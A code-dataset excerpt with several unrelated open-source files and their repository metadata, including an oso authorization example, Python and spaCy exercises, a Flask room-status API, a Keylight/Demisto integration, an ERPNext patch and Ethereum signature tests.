data structures that might already exist in, for example, a database.
"""
# External imports
from oso import Oso, polar_class
# Stdlib imports
import os
from pathlib import Path
import sys
# Local imports
from data import *
@polar_class
class User:
"""User model"""
# username
name: str
# global role
role: str
# user's location
location: str
def __init__(self, name="", role="", location=""):
self.name = name
self.role = role
self.location = location
@classmethod
def by_name(cls, name=""):
"""Lookup method to get a `User` object from the string name"""
if name in USERS:
return User(name, **USERS[name])
else:
# empty/non-existing user
return User()
def employees(self):
"""Returns the employees managed by this user"""
if self.name in MANAGERS:
for name in MANAGERS[self.name]:
yield User.by_name(name)
@polar_class
class Expense:
"""Expense model"""
def __init__(self, amount: int, submitted_by: str, location: str, project_id: int):
self.amount = amount
self.submitted_by = submitted_by
self.location = location
self.project_id = project_id
@classmethod
def id(cls, id: int):
if id < len(EXPENSES):
return Expense(**EXPENSES[id])
else:
return Expense()
@polar_class
class Project:
"""Project model"""
def __init__(self, team_id: int):
self.team_id = team_id
@classmethod
def id(cls, id: int):
if id < len(PROJECTS):
return Project(**PROJECTS[id])
else:
return Project()
@polar_class
class Team:
"""Team model"""
def __init__(self, organization_id: int):
self.organization_id = organization_id
@classmethod
def id(cls, id: int):
if id < len(TEAMS):
return Team(**TEAMS[id])
else:
return Team()
@polar_class
class Organization:
"""Organization model"""
def __init__(self, name: str):
self.name = name
@classmethod
def id(cls, id: int):
if id < len(ORGANIZATIONS):
return Organization(**ORGANIZATIONS[id])
else:
return Organization()
@polar_class
class Env:
"""Helper class for oso, looks up environment variables"""
@classmethod
def var(cls, variable):
return os.environ.get(variable, None)
def load_oso():
"""Loads and returns the oso policy"""
oso = Oso()
policy_path = Path(__file__).resolve().parent.parent / "expenses"
## Policy Data
oso.load_file(policy_path / "data.polar")
## Role definitions
oso.load_file(policy_path / "roles.polar")
## ABAC policy
oso.load_file(policy_path / "abac.polar")
return oso
if __name__ == "__main__":
"""Loads and checks the policy.
Run example with `python app.py repl` to run the REPL after loading
the policy.
"""
oso = load_oso()
print("Policy loaded OK")
if len(sys.argv) > 1 and sys.argv[1] == "repl":
oso.repl()
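# --- Hedged usage sketch (added; "alice" and the "read" action are
# placeholders -- the real names depend on USERS and the .polar policy):
#
#     oso = load_oso()
#     alice = User.by_name("alice")
#     expense = Expense.id(0)
#     print(oso.is_allowed(alice, "read", expense))  # True iff the policy allows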
| 22.02027 | 87 | 0.606321 |
a8470cc0bcf8909810b2d2fb66353d7f6a89e60a
| 318 |
py
|
Python
|
Programming Languages/Python/Theory/100_Python_Challenges/Section_4_Dictionary/74. map two lists into a dictionary.py
|
jaswinder9051998/Resources
|
fd468af37bf24ca57555d153ee64693c018e822e
|
[
"MIT"
] | 101 |
2021-12-20T11:57:11.000Z
|
2022-03-23T09:49:13.000Z
|
Programming Languages/Python/Theory/100_Python_Challenges/Section_4_Dictionary/74. map two lists into a dictionary.py
|
Sid-1164/Resources
|
3987dcaeddc8825f9bc79609ff26094282b8ece1
|
[
"MIT"
] | 4 |
2022-01-12T11:55:56.000Z
|
2022-02-12T04:53:33.000Z
|
Programming Languages/Python/Theory/100_Python_Challenges/Section_4_Dictionary/74. map two lists into a dictionary.py
|
Sid-1164/Resources
|
3987dcaeddc8825f9bc79609ff26094282b8ece1
|
[
"MIT"
] | 38 |
2022-01-12T11:56:16.000Z
|
2022-03-23T10:07:52.000Z
|
"""
Write a Python function to map two lists into a dictionary.
list1 contains the keys, list2 contains the values.
Input lists:
list1 = [1,2,3,4,5]
list2 = [6,7,8,9,10]
Expected output: {1: 6, 2: 7, 3: 8, 4: 9, 5: 10}
"""
#Solution is:
def map_lists(list1,list2):
return (dict(zip(list1,list2)))
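# Quick check against the expected output above:
print(map_lists([1, 2, 3, 4, 5], [6, 7, 8, 9, 10]))  # {1: 6, 2: 7, 3: 8, 4: 9, 5: 10}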
| 16.736842 | 60 | 0.632075 |
a8c4c7e70a2ae7c2df8023aed85c416da9216dd1
| 251 |
py
|
Python
|
exercises/pt/exc_01_02_02.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/pt/exc_01_02_02.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/pt/exc_01_02_02.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
# Import the German language class
from spacy.lang.____ import ____
# Create an nlp object
nlp = ____
# Process the text (German for "Kind regards")
doc = nlp("Liebe Grüße!")
# Print the document text
print(____.text)
| 20.916667 | 63 | 0.741036 |
76878e49793555b3817e63c2273a4d0a827f9b30
| 630 |
py
|
Python
|
WebHostLib/api/__init__.py
|
Berserker66/ALttPEntranceRandomizer
|
9c681cc65d7281ccded03484b050e8f80ea65dc6
|
[
"MIT"
] | null | null | null |
WebHostLib/api/__init__.py
|
Berserker66/ALttPEntranceRandomizer
|
9c681cc65d7281ccded03484b050e8f80ea65dc6
|
[
"MIT"
] | 5 |
2020-01-18T21:10:46.000Z
|
2020-01-25T20:58:19.000Z
|
WebHostLib/api/__init__.py
|
Berserker66/ALttPEntranceRandomizer
|
9c681cc65d7281ccded03484b050e8f80ea65dc6
|
[
"MIT"
] | 2 |
2020-01-18T17:36:50.000Z
|
2020-01-22T16:52:08.000Z
|
"""API endpoints package."""
from uuid import UUID
from flask import Blueprint, abort
from ..models import Room
api_endpoints = Blueprint('api', __name__, url_prefix="/api")
from . import generate, user # trigger registration
# unsorted/misc endpoints
@api_endpoints.route('/room_status/<suuid:room>')
def room_info(room: UUID):
room = Room.get(id=room)
if room is None:
return abort(404)
return {"tracker": room.tracker,
"players": room.seed.multidata["names"],
"last_port": room.last_port,
"last_activity": room.last_activity,
"timeout": room.timeout}
| 25.2 | 61 | 0.663492 |
8caeaa7740c0ef79bffd514cba373283cc8521fc
| 27,141 |
py
|
Python
|
Packs/Lokpath_Keylight/Integrations/Lockpath_KeyLight_v2/Lockpath_KeyLight_v2.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Lokpath_Keylight/Integrations/Lockpath_KeyLight_v2/Lockpath_KeyLight_v2.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Lokpath_Keylight/Integrations/Lockpath_KeyLight_v2/Lockpath_KeyLight_v2.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
from datetime import datetime, timedelta
from typing import Union
import traceback
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
FILTER_DICT = {'Contains': '1',
'Excludes': '2',
'Starts With': '3',
'Ends With': '4',
'Equals': '5',
'Not Equals': '6',
'Greater Than': '7',
'Less Than': '8',
'Greater Equals Than': '9',
'Less Equals Than': '10',
'Between': '11',
'Not Between': '12',
'Is Null': '15',
'Is Not Null': '16'}
INTEGRATION_CONTEXT_SIZE = 15
'''CLIENT'''
class Client(BaseClient):
@logger
def _http_request(self, method, url_suffix, full_url=None, headers=None,
auth=None, json_data=None, params=None, data=None, files=None,
timeout=10, resp_type='json', ok_codes=None, **kwargs):
res = super()._http_request(method=method, url_suffix=url_suffix, full_url=full_url, headers=headers,
auth=auth, json_data=json_data, params=params, data=data, files=files,
timeout=timeout, resp_type=resp_type, ok_codes=ok_codes, **kwargs)
return res
def login(self, username: str, password: str) -> bool:
"""
Logs in to the server and keeps the cookie as header.
Args:
username:
password:
Returns:
Returns if connection was successful.
"""
body = {
'username': username,
'password': password
}
res = self._http_request('POST', '/SecurityService/Login', resp_type='response', json_data=body)
successful = res.content == b'true'
return successful
def logout(self):
"""
Logs out of the connection.
"""
self._http_request('GET', '/SecurityService/Logout')
def return_components(self, link: str, params: dict = None) -> None:
res = self._http_request('GET', link, params=params)
if isinstance(res, dict):
res['ID'] = res.pop('Id')
else:
for comp in res:
comp['ID'] = comp.pop('Id')
        ec = {'Keylight.Component(val.ID && val.ID==obj.ID)': res}
hr = tableToMarkdown("Keylight Components", res)
return_outputs(hr, ec, res)
def return_fields(self, suffix: str, params: dict = None, title: str = None) -> None:
"""
        Runs a field command according to the given suffix and returns the result.
        Args:
            suffix: which API call to make
            params: optional query parameters for the API call
            title: the title for the markdown table
Returns:
"""
res = self._http_request('GET', suffix, params=params)
if isinstance(res, dict):
res['ID'] = res.pop('Id')
else:
for field in res:
field['ID'] = field.pop('Id')
        ec = {'Keylight.Field(val.ID && val.ID==obj.ID)': res}
hr = tableToMarkdown(title,
res, ['ID', 'Name', 'SystemName', 'ShortName', 'ReadOnly', 'Required'])
return_outputs(hr, ec, res)
def return_records(self, component_id: str, record_id: str, field_names: str,
suffix: str) -> None:
"""
        Fetches a record via the given API suffix and returns it to Demisto.
        Args:
            component_id: The component ID
record_id: which record to return
field_names: what fields to return
suffix: The suffix for the API request
Returns:
None
"""
params = {'componentID': component_id,
'recordId': record_id}
res = self._http_request('GET', suffix, params=params)
field_names = argToList(field_names)
all_fields = self.field_output_to_hr_fields(res.get('FieldValues', []), component_id, field_names)
record = {'ID': res.get('Id'),
'ComponentID': component_id,
'DisplayName': res.get('DisplayName', '')
}
hr = tableToMarkdown(f'Details for record {record.get("DisplayName")}:', record)
hr += tableToMarkdown('With the following fields:', all_fields)
record['Fields'] = all_fields
        ec = {'Keylight.Record(val.ID && val.ID==obj.ID)': record}
return_outputs(hr, ec, res)
def return_filtered_records(self, component_id: str, page_size: str, page_index: str, suffix: str,
filter_type: str = None, filter_field_id: str = None, filter_value: str = None) -> dict:
"""
Args:
component_id: component id
page_size: how many results to return per page
page_index: what page number
suffix: API suffix
            filter_type: What filter to apply (one of the keys of FILTER_DICT)
filter_field_id: which field to apply the filter on
filter_value: the filter value
Returns:
number of records according to a certain query made up of filter_type, filter_value and filter_field_id
"""
data = {'componentId': component_id,
'pageIndex': page_index,
'pageSize': page_size}
if filter_type:
data['filters'] = [create_filter(filter_type, filter_value, filter_field_id)] # type: ignore
else:
data['filters'] = [] # type: ignore
res = self._http_request('POST', suffix, json_data=data)
for result in res:
result['ID'] = result.pop('Id')
result['ComponentID'] = component_id
return res
def change_record(self, component_id: str, record_id: Union[str, None] = None,
record_json: dict = None) -> None:
json_data = {
'componentId': component_id,
'dynamicRecord': {
'FieldValues': self.string_to_FieldValues(record_json, component_id)
}
}
suffix = '/ComponentService/CreateRecord'
if record_id:
json_data['dynamicRecord']['Id'] = record_id # type: ignore
suffix = '/ComponentService/UpdateRecord'
res = self._http_request('POST', suffix, json_data=json_data)
fields = self.field_output_to_hr_fields(res.get('FieldValues', []), component_id)
record = {'ID': res.get('Id'),
'ComponentID': component_id,
'DisplayName': res.get('DisplayName', '')
}
hr = tableToMarkdown(f'Task "{record.get("DisplayName")}":', record)
hr += tableToMarkdown('With the following fields:', fields)
record['Fields'] = fields
        ec = {'Keylight.Record(val.ID && val.ID==obj.ID)': record}
return_outputs(hr, ec, res)
'''HELPER CLIENT FUNCTIONS'''
def component_id_from_name(self, name: str) -> str:
"""
Args:
name: Name of component
Returns:
The component ID
"""
component_list = self._http_request('GET', '/ComponentService/GetComponentList')
component = {} # type: dict
for comp in component_list:
if comp.get('Name') == name:
component = comp
return str(component.get('Id'))
def field_id_from_name(self, name: str, component_id: str) -> Union[str, None]:
"""
Args:
name: The field's name
component_id:
Returns:
The field_id if it exists
"""
field_map = demisto.getIntegrationContext().get(str(component_id))
if not field_map:
self.update_field_integration_context(component_id)
field_map = demisto.getIntegrationContext().get(str(component_id))
fields = field_map.get('fields')
for field_key, field_name in fields.items():
if field_name == name:
return field_key
return None
@logger
def update_field_integration_context(self, component_id: str) -> None:
"""
        Update the integration context to include the component_id, keeping at most
        INTEGRATION_CONTEXT_SIZE component tables stored.
        Update policy: FIFO (the component with the oldest update time is evicted first).
        The integration context will look like: {
component_id: {
last_update: $date
fields: {field_key: field_name.
field_key, field_name,
...,
}
}
}
Args:
component_id: The id of the component we want to add to the integration context
Returns: None
"""
field_map = demisto.getIntegrationContext()
if field_map.get(str(component_id)):
field_map.pop(str(component_id))
params = {'componentId': component_id}
fields = self._http_request('GET', '/ComponentService/GetFieldList', params=params)
field_names = {}
for field in fields:
field_names[str(field.get('Id'))] = field.get('Name')
update = datetime.now().strftime("%Y-%m-%dT%H:%M:%S")
if len(field_map) == INTEGRATION_CONTEXT_SIZE:
min_time = update
min_component = ''
for component in field_map.keys():
updated = field_map.get(component).get('updated')
if parse_date_string(updated) < parse_date_string(min_time):
min_time = updated
min_component = component
field_map.pop(min_component)
field_map[str(component_id)] = {'fields': field_names,
'updated': update
}
demisto.setIntegrationContext(field_map)
@logger
def field_output_to_hr_fields(self, field_output: dict, component_id: str, returned_fields: list = None) -> dict:
'''
Args:
field_output: a dictionary of key,values that is the output of FieldValue field
component_id: What component the fields are from
returned_fields: A list of field names to return. If None - all fields returned
        Returns:
            A dict mapping field names to their values (restricted to returned_fields if given).
'''
field_map = demisto.getIntegrationContext().get(str(component_id))
final_fields = {}
if not field_map:
self.update_field_integration_context(component_id)
field_map = demisto.getIntegrationContext().get(str(component_id))
fields = field_map.get('fields')
for field_dict in field_output:
field_key = field_dict.get('Key')
field_val = field_dict.get('Value')
if not fields.get(str(field_key)):
self.update_field_integration_context(component_id)
fields = demisto.getIntegrationContext().get(str(component_id)).get('fields')
field_name = fields.get(str(field_key))
if isinstance(field_val, dict) and field_val.get('DisplayName'):
field_val = {'Value': field_val.get('DisplayName'),
'ID': field_val.get('Id', -1)}
if not returned_fields or field_name in returned_fields:
final_fields[field_name] = field_val
return final_fields
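    # Example (hypothetical IDs): field_output [{'Key': 123, 'Value': 'High'}]
    # with a cached field map {'123': 'Severity'} becomes {'Severity': 'High'}.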
@logger
def string_to_FieldValues(self, fields_json: Union[dict, list], component_id: str) -> list:
"""
Args:
            fields_json: a list of fields in the format:
[{
"fieldName": "Task ID",
"value": "1",
"isLookup": false
},
...
]
Returns:
            The right format (dynamicRecord) for creating or updating a record.
"""
key_val_return = []
for field in fields_json:
field_id = self.field_id_from_name(field.get('fieldName', ''), component_id)
value = field.get('value', '')
if not field_id:
raise ValueError(f'Could not find the field "{field.get("fieldName", "")}" in component {component_id}.')
if field.get('isLookup', ''):
key_val_return.append(
{
'Key': field_id,
'Value': {
'Id': value
}
}
)
else:
key_val_return.append({'Key': field_id, 'Value': value})
return key_val_return
'''HELPER FUNCTIONS'''
@logger
def create_filter(filter_type: str, filter_value: str, filter_field_id: str) -> dict:
"""
Args:
filter_type: What type of filter to apply on the field. out of FILTER_DICT
filter_value:
filter_field_id:
Returns:
A filter made from the arguments in the format keylight needs.
"""
# adding filter if exists
if not FILTER_DICT.get(filter_type):
raise ValueError('Filter Type is invalid.')
filter = {
"FieldPath": [int(filter_field_id)],
"FilterType": FILTER_DICT.get(filter_type),
'Value': filter_value
}
return filter
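# Example (hypothetical field id 123):
#   create_filter('Greater Than', '2020-01-01T00:00:00', '123')
#   -> {"FieldPath": [123], "FilterType": "7", "Value": "2020-01-01T00:00:00"}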
'''COMMAND FUNCTIONS'''
def get_component_command(client: Client, args: dict) -> None:
'''
Args:
client: The client
args: Demisto.args()
Returns:
A list of all components.
'''
if args.get('component_id'):
params = {'id': args.get('component_id')}
client.return_components('/ComponentService/GetComponent', params)
elif args.get('alias'):
params = {'alias': args.get('alias')}
client.return_components('/ComponentService/GetComponentByAlias', params)
else:
client.return_components('/ComponentService/GetComponentList')
def get_field_list_command(client: Client, args: dict) -> None:
params = {'componentId': args.get('component_id')}
client.return_fields('/ComponentService/GetFieldList', params,
f"Keylight fields for component {params.get('componentId')}:")
def get_field_command(client: Client, args: dict) -> None:
field_id = client.field_id_from_name(args.get('field_name', ''), args.get('component_id', ''))
params = {'id': field_id}
client.return_fields('/ComponentService/GetField', params,
f"Keylight field {params.get('id')}:")
def get_record_command(client: Client, args: dict) -> None:
path = '/ComponentService/GetDetailRecord' if args.get('detailed', "False") == "True" \
else '/ComponentService/GetRecord'
client.return_records(args.get('component_id', ''), args.get('record_id', ''), args.get('field_names', ''), path)
def get_records_command(client: Client, args: dict) -> None:
page_size = str(min(int(args.get('page_size', '10')), 100))
component_id = args.get('component_id', '')
page_index = args.get('page_index', "0")
filter_type = args.get('filter_type')
filter_value = args.get('filter_value', '')
field_name = args.get('filter_field_name', '')
returned_fields = argToList(args.get('returned_fields', ''))
filter_field_id = None
if filter_type and filter_value and field_name:
filter_field_id = client.field_id_from_name(field_name, component_id)
if not filter_field_id:
raise ValueError(f'Could not find the field "{field_name}" in component {component_id}.')
detailed = '/ComponentService/GetDetailRecords' if args.get('detailed', "False") == "True" \
else '/ComponentService/GetRecords'
res = client.return_filtered_records(component_id, page_size, page_index, detailed,
filter_type, filter_field_id, filter_value)
for record in res:
record['Fields'] = client.field_output_to_hr_fields(record.pop('FieldValues'), component_id, returned_fields)
ec = {'Keylight.Record(val.ID == obj.ID)': res}
title = f'Records for component {component_id}'
if filter_type:
title += f' \n### with filter "{filter_type}: {filter_value}" on field "{field_name}"'
records = []
for record in res:
temp_dict = record.get('Fields').copy()
for key in temp_dict.keys():
if isinstance(temp_dict[key], dict):
temp_dict[key] = temp_dict[key].get('Value')
temp_dict['Id'] = record.get("ID")
temp_dict['DisplayName'] = record.get('DisplayName')
records.append(temp_dict)
hr = tableToMarkdown(title, records)
# hr = f'# {title}\n'
# for record in res:
# hr += tableToMarkdown(f'Record {record.get("DisplayName", "")} (ID: {record.get("ID", "")}):',
# record.get("Fields"))
return_outputs(hr, ec, res)
def get_record_count_command(client: Client, args: dict) -> None:
component_id = args.get('component_id', '')
filter_type = args.get('filter_type', '')
filter_value = args.get('filter_value', '')
filter_field_name = args.get('filter_field_name', '')
data = {'componentId': component_id}
if not filter_type or not filter_value or not filter_field_name:
data['filters'] = []
else:
filter_field_id = client.field_id_from_name(filter_field_name, component_id)
if not filter_field_id:
raise ValueError('Could not find the field name.')
data['filters'] = [create_filter(filter_type, filter_value, filter_field_id)]
res = client._http_request('POST', '/ComponentService/GetRecordCount', json_data=data)
title = f'## There are **{res}** records in component {component_id}.\n'
if filter_type:
title += f'### with filter: "{filter_type} {filter_value}" on field `{filter_field_name}`'
return_outputs(title)
def get_record_attachments_command(client: Client, args: dict) -> None:
field_name = args.get('field_name', '')
record_id = args.get('record_id', '')
component_id = args.get('component_id', '')
field_id = client.field_id_from_name(field_name, component_id)
params = {'componentID': component_id,
'recordId': record_id,
'fieldId': field_id
}
res = client._http_request('GET', '/ComponentService/GetRecordAttachments', params=params)
for doc in res:
doc['FieldID'] = doc.pop("FieldId")
doc['DocumentID'] = doc.pop('DocumentId')
doc['RecordID'] = record_id
doc['ComponentID'] = component_id
if not res:
hr = f'## Field {field_id} in record {record_id} has no attachments.'
return_outputs(hr)
return
hr = tableToMarkdown(f'Field {field_name} in record {record_id} has the following attachments:', res)
ec = {'Keylight.Attachment(val.FieldID == obj.FieldID && val.DocumentID == obj.DocumentID)': res}
return_outputs(hr, ec, res)
def get_record_attachment_command(client: Client, args: dict) -> None:
component_id = args.get('component_id', '')
field_name = args.get('field_name', '')
record_id = args.get('record_id', '')
doc_id = args.get('document_id', '')
field_id = client.field_id_from_name(field_name, component_id)
params = {'componentID': component_id,
'recordId': record_id,
'fieldId': field_id,
'documentId': doc_id
}
res = client._http_request('GET', '/ComponentService/GetRecordAttachment', params=params)
demisto.results(fileResult(res.get("FileName", ""), base64.b64decode(res.get("FileData"))))
def delete_record_attachment_command(client: Client, args: dict) -> None:
field_id = args.get('field_id', '')
record_id = args.get('record_id', '')
doc_id = args.get('document_id', '')
component_id = args.get('component_id', '')
json_data = {
"componentId": component_id,
"dynamicRecord": {
"Id": record_id,
"FieldValues": [
{
"Key": field_id,
"value": [
{
"Id": doc_id
}
]
}
]
}
}
client._http_request('POST', '/ComponentService/DeleteRecordAttachments', json_data=json_data)
return_outputs("### Attachment was successfully deleted from the Documents field.")
def delete_record_command(client: Client, args: dict) -> None:
component_id = args.get('component_id', '')
record_id = args.get('record_id', '')
json_data = {
'componentId': component_id,
'recordId': record_id
}
client._http_request('DELETE', '/ComponentService/DeleteRecord', json_data=json_data)
return_outputs(f'### Record {record_id} of component {component_id} was deleted successfully.')
def get_lookup_report_column_fields_command(client: Client, args: dict) -> None:
field_path_id = args.get('field_path_id', '')
lookup_field_id = args.get('lookup_field_id', '')
params = {
'lookupFieldId': lookup_field_id,
'fieldPathId': field_path_id
}
res = client._http_request('GET', '/ComponentService/GetLookupReportColumnFields', params=params)
for rec in res:
rec['ID'] = rec.pop("Id")
rec['ComponentID'] = rec.pop("ComponentId")
ec = {'Keylight.LookupField(val.ID === obj.ID)': res}
hr = tableToMarkdown(f'Here is more information about field path {field_path_id}, lookup field {lookup_field_id}:',
res)
return_outputs(hr, ec, res)
def create_record_command(client: Client, args: dict) -> None:
component_id = args.get('component_id', '')
record_json = args.get('record_json', '{}').replace("'", '"')
record_json = json.loads(record_json)
client.change_record(component_id, record_json=record_json)
def update_record_command(client: Client, args: dict) -> None:
component_id = args.get('component_id', '')
record_id = args.get('record_id', '')
record_json = args.get('record_json', '{}').replace("'", '"')
record_json = json.loads(record_json)
client.change_record(component_id, record_id, record_json)
def get_user_by_id_command(client: Client, args: dict) -> None:
user_id = args.get('user_id', '')
res = client._http_request('GET', f'/SecurityService/GetUser?id={user_id}')
hr = tableToMarkdown(f'Keylight user {user_id}', res)
ec = {'Keylight.User(val.Id && val.Id==obj.Id)': res}
return_outputs(hr, ec, res)
def fetch_incidents(client: Client, args: dict) -> None:
name = demisto.params().get('component_name', '')
filter_field = demisto.params().get('filter_field', '')
page_size = str(min(int(demisto.params().get('fetch_limit', '50')), 50))
if not name or not filter_field:
raise ValueError("No component alias or field to filter by specified.")
last_fetch_time = demisto.getLastRun().get('last_fetch_time')
if not last_fetch_time:
now = datetime.now()
last_fetch = now - timedelta(days=120)
last_fetch_time = last_fetch.strftime("%Y-%m-%dT%H:%M:%S")
# Find component ID
component_id = demisto.getLastRun().get('component', {}).get(name)
if not component_id:
component_id = client.component_id_from_name(name)
if component_id == 'None':
raise ValueError("Could not find component name.")
field_id = demisto.getLastRun().get('field', {}).get(filter_field)
if not field_id:
field_id = client.field_id_from_name(filter_field, component_id)
if not field_id:
raise ValueError("Could not find field name.")
res = client.return_filtered_records(component_id, page_size, '0', '/ComponentService/GetDetailRecords',
'Greater Than', field_id, last_fetch_time)
incidents = []
max_fetch_time = last_fetch_time
for record in res:
record['Fields'] = client.field_output_to_hr_fields(record.pop('FieldValues'), component_id)
occurred_at = record.get('Fields', {}).get(filter_field, datetime.now().strftime("%Y-%m-%dT%H:%M:%S"))
incident = {'name': f'Keylight record {record.get("DisplayName")}',
'occurred': occurred_at.split('.')[0] + 'Z',
'rawJSON': json.dumps(record)
}
if datetime.strptime(occurred_at.split('.')[0], "%Y-%m-%dT%H:%M:%S") > \
datetime.strptime(max_fetch_time.split('.')[0], "%Y-%m-%dT%H:%M:%S"):
max_fetch_time = occurred_at
incidents.append(incident)
demisto.setLastRun({'last_fetch_time': max_fetch_time,
'component': {name: component_id},
'field': {filter_field: field_id}})
demisto.incidents(incidents)
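# Note on the fetch state above: demisto.setLastRun() persists last_fetch_time
# together with the resolved component and field IDs, so subsequent
# fetch_incidents runs can skip the name-to-ID lookups against the API.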
def main():
params = demisto.params()
proxy = params.get('proxy')
verify = not params.get('insecure')
address = params.get('server', '').rstrip('/')
username = params.get('credentials', {}).get('identifier', '')
password = params.get('credentials', {}).get('password', '')
client = Client(address, verify, proxy, headers={'Accept': 'application/json'})
commands = {
'kl-get-component': get_component_command,
'kl-get-field-list': get_field_list_command,
'kl-get-field': get_field_command,
'kl-get-record-count': get_record_count_command,
'kl-get-record': get_record_command,
'kl-get-records': get_records_command,
'kl-delete-record': delete_record_command,
'kl-create-record': create_record_command,
'kl-update-record': update_record_command,
'kl-get-lookup-report-column-fields': get_lookup_report_column_fields_command,
'kl-get-record-attachment': get_record_attachment_command,
'kl-get-record-attachments': get_record_attachments_command,
'kl-delete-record-attachment': delete_record_attachment_command,
'kl-get-user-by-id': get_user_by_id_command,
'fetch-incidents': fetch_incidents,
}
LOG(f'Command being called is {demisto.command()}')
logged_in = False
try:
logged_in = client.login(username, password)
if logged_in:
if demisto.command() == 'test-module':
demisto.results('ok')
else:
commands[demisto.command()](client, demisto.args())
except Exception as e:
if not logged_in:
return_error(f"Could not connect to instance. Make sure your credentials are correct and haven't changed."
f" Error: {str(e)}")
else:
return_error(f'Failed to execute {demisto.command()} command. Error: {str(e)}',
error=traceback.format_exc())
finally:
if logged_in:
client.logout()
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 40.448584 | 121 | 0.591909 |
5092695b7d9a370914bff98c552a538045f77a9b
| 544 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/patches/v9_0/set_shipping_type_for_existing_shipping_rules.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
frappe-bench/apps/erpnext/erpnext/patches/v9_0/set_shipping_type_for_existing_shipping_rules.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/patches/v9_0/set_shipping_type_for_existing_shipping_rules.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
# Copyright (c) 2017, Frappe and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
def execute():
frappe.reload_doctype("Shipping Rule")
# default "calculate_based_on"
frappe.db.sql('''update `tabShipping Rule`
set calculate_based_on = "Net Weight"
where ifnull(calculate_based_on, '') = '' ''')
# default "shipping_rule_type"
frappe.db.sql('''update `tabShipping Rule`
set shipping_rule_type = "Selling"
where ifnull(shipping_rule_type, '') = '' ''')
| 28.631579 | 57 | 0.735294 |
50c9c6bdbfe7ced608c21a9e7ea3c4650da31a60
| 1,643 |
py
|
Python
|
contracts/tests/test_LibSignatures.py
|
PerunEthereum/Perun
|
0704f481e8747f6f4405e67abe1cafd5d96d2ab8
|
[
"MIT"
] | 64 |
2018-04-10T19:28:59.000Z
|
2020-11-10T02:56:57.000Z
|
contracts/tests/test_LibSignatures.py
|
PerunEthereum/Perun
|
0704f481e8747f6f4405e67abe1cafd5d96d2ab8
|
[
"MIT"
] | 2 |
2018-05-18T15:39:10.000Z
|
2018-12-17T19:00:50.000Z
|
contracts/tests/test_LibSignatures.py
|
PerunEthereum/Perun
|
0704f481e8747f6f4405e67abe1cafd5d96d2ab8
|
[
"MIT"
] | 9 |
2018-04-10T21:17:41.000Z
|
2019-12-10T11:42:34.000Z
|
import pytest
accounts = ['0xd0edc0d7073c2931edbadbdcab6b67ea4929a110', '0xa7183ed8bd8961a004f2213daa307386a49745d7', '0xa5b40bbbe0cc5f7f9ce2fae5aa0e3572a55bd02c']
messages = ['0123456789', '', 'test' * 100]
signatures = ['0xa03cdc8c0af5867cb0d97d0fd23ff54fc792c9537adcbd71148172b77b079336697d0a12245d8797e5266d2e81aa6908490bad393a950d0572c1a483fb4f26341c',
'0x40afe208deede24693c3e459e5d3a26013d2f0fa7322a2695e5a7dd70032917f56e7da6e44541432fa5c669ffcac95846e204e3624876a97b550703f69eb39bb1b',
'0xd3c8f0adf9782c251a31fbf1e83c5e4ab36940b59d5f175fb7ccbe89e5079d2c434eefa46d8d129f04ac15a6236f165debee07334898036262c36ef39247829a1b']
@pytest.fixture()
def libSignatures(chain):
return chain.provider.get_or_deploy_contract('LibSignatures')[0]
def add_prefix(message):
return '\x19Ethereum Signed Message:\n' + str(len(message)) + message
def prepare_message(web3, message):
return web3.toAscii(web3.sha3(web3.toHex(add_prefix(message))))
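# Descriptive note: add_prefix/prepare_message reproduce Ethereum's
# personal_sign scheme (EIP-191): the message is prefixed with
# "\x19Ethereum Signed Message:\n" plus its length before hashing, so the
# signatures above verify against the hash of the prefixed message rather
# than the raw message.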
def generic_test_LibSignatures(libSignatures, account, message, signature, result):
assert libSignatures.call().verify(account, message, signature) == result
def test_LibSignatures_ok(web3, libSignatures):
for acc, mess, sig in zip(accounts, messages, signatures):
generic_test_LibSignatures(libSignatures, acc, prepare_message(web3, mess), web3.toAscii(sig), True)
def test_LibSignatures_wrong(web3, libSignatures):
wrong_accounts = accounts[1:] + [accounts[0]]
for acc, mess, sig in zip(wrong_accounts, messages, signatures):
generic_test_LibSignatures(libSignatures, acc, prepare_message(web3, mess), web3.toAscii(sig), False)
| 54.766667 | 149 | 0.805843 |
50df50eda3b643ac8bcf0c9cda477fd2025fa56c
| 576 |
py
|
Python
|
Vorlesungsinhalte/2020-10-30_Rekursion.py
|
wwi20ama-programmierung/python-intro
|
e779e3f600b7e54b7c5baef503b79065bdc3cdb6
|
[
"MIT"
] | null | null | null |
Vorlesungsinhalte/2020-10-30_Rekursion.py
|
wwi20ama-programmierung/python-intro
|
